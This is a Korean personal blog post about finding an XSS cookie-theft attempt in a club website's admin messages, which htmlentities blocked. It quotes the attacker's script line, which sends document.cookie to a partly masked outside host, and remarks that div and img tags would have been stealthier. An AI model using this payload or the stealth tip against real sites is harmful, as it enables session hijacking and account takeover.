2016. 02. 02.

갑작스럽게 작년 10월 부터 동아리 웹 사이트를 관리하게 되었다. 그래서 예전 사이트 관리자에게 관리자 id와 password를 받고 관리를 맡게 되었다.

아무래도 좀 오래된 사이트이다보니까 php 버전을 올리니 바로 작동이 500 에러를 내뱉어서 그것을 정상 작동을 시키려고 소스코드를 다 띁어서 봐야 했던 점이 약간 짜증도 났었다.(소스 코드가 frame과 table로 떡칠이 되어 있어서 html5에 맞는 레이아웃을 짜기에는 너무 버거웠다..ㅂㄷㅂㄷ... 차라리 새로 사이트를 구축하는게 빠를 정도로....)

원래 내가 사용하던 계정도 있어서 보통은 그 계정으로 사이트를 관리를 하는데, 최고 권한이 필요한 일이 있어서 관리자 id로 로그인을 했다. 그랬더니 자꾸 메시지가 왔다고 하길래 메시지 리스트를 보니 "관리자님"이라는 제목으로 메시지가 온 것을 확인할 수 있었다.

'음 뭐지?'라는 생각으로 아무 생각 없이 메시지를 열었는데, 메시지 내용이 아래와 같았다.

<script>document.location='http://*************.or.kr/**.php?cookie='+document.cookie</script>ㅁㄴㅇㅁㄴㅇ

ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ 아무 생각 없이 메시지를 읽는 부분에서 htmlentities를 사용했던 것이 다행이었다. 공격자는 관리자의 쿠키 정보를 빼가려고 다음과 같은 메시지를 보냈던 것이었다. 아무리 그래도 보통 한 번 정도는 자신에게 테스트를 해보고 공격을 시도를 해보지 않나??ㅋㅋㅋㅋㅋㅋ 그리고 바로 관리자에게 공격시도를 했다는 점에 대해서 참 간이 크구나 하는 생각이 들었다.

그리고 저런 식으로 공격하면 당연히 웹 사이트가 페이지 이동을 하기 때문에 관리자도 바로 확인이 가능할거고 ㅋㅋㅋㅋㅋㅋㅋㅋ 차라리 div와 img를 태그를 조합해서 공격을 하는 것이 더 효율적이었을 것이다.ㅋㅋㅋㅋㅋㅋ 아무래도 구글에서 한글로 된 해킹 문서를 찾다가 위와 같은 방법을 찾아서 해킹 시도를 한 것 같다.ㅋㅋㅋㅋㅋㅋ

물론 그대로 sql을 덤프 떠 놓았기 때문에 이 메시지를 삭제하더라도 바로 신고가 가능하다. 음... 이거 가지고는 치킨은 안되겠지..??ㅋㅋㅋㅋㅋ

그런데 저 쿠키를 수집하는 주소가 해커의 주소가 아닌 어떤 한 기관의 웹사이트 주소였다.....?? 뭐지?? 저 사이트를 해킹하고 그 다음으로 우리 동아리 사이트의 해킹을 시도했다...??? 그래서 그 사이트에 들어가서 보니 쿠키 정보를 열심히 수집해서 저장을 하고 있는 것을 확인할 수 있었다. 그리고 우리 동아리 웹사이트 뿐만 아니라 다른 웹사이트에 대해서도 똑같이 이와 비슷한 형태로 공격을 시도한다는 것을 알 수 있었다.

아무래도 그 기관의 웹 사이트에서 php 파일 업로드를 막지 못해서 이와 같은 형태의 공격이 시행된 것으로 보인다. 구글링을 해서 나오지 않는 것을 보면 분명히 직접 공격을 시도를 해서 그 사이트를 해킹했다는 소리일텐데 말이지... 그렇게 간단하게 사이트를 해킹할 수 있으면서 내가 운영하는 동아리 사이트는 너무 허술하게 공격을 시도한 것이 이상하다..ㅋㅋㅋㅋㅋㅋㅋ

일단 그 웹사이트에 메일을 보내놓긴 했는데, 답변이 올지는 모르겠다. 대강 봐보니까 사이트가 관리가 되지 않는 것이 보이던데... 뭐 답변이 안오면 알릴 수 있는 다른 방법을 찾아봐야겠다.